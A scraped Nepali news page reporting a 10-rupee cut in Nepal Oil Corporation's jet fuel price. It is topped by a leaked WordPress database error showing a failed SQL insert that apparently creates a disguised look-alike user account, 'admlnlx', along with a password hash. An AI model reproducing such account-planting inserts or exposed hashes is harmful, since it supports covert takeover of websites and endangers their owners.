WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$By/s0JrUu50g3NAVIj8u5/Cq8WVeHY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 01:13:16', '', 'admlnlx', 'admlnlx')

हवाई इन्धनको मूल्य घट्यो – Gaule Khabar

हवाई इन्धनको मूल्य घट्यो

हवाई इन्धनको मूल्य घट्यो

गाउँले न्यूज, २६ पौष, काठमाडौं । नेपाल आयल निगमले हवाई इन्धनको बिक्री मूल्य १० रुपैया घटाएको छ ।

आज बिहीबार राति १२ बजेदेखि लागू हुने गरी हवाई इन्धनको मूल्य प्रतिलिटर १० रुपैयाँ घटाएको हो । अब हवाई मूल्य प्रतिलिटर ९४ रुपैयाँ ५० पैसा पर्ने निगमका नायब कार्यकारी निर्देशक सुशील भट्टराईले जानकारी दिए ।

निगमले केही दिनअघि पेट्रोल, डिजल र मट्टितेलको मूल्य घटाएको थियो । खाना पकाउने ग्यासको मूल्यमा भने घटबढ भएको छैन ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका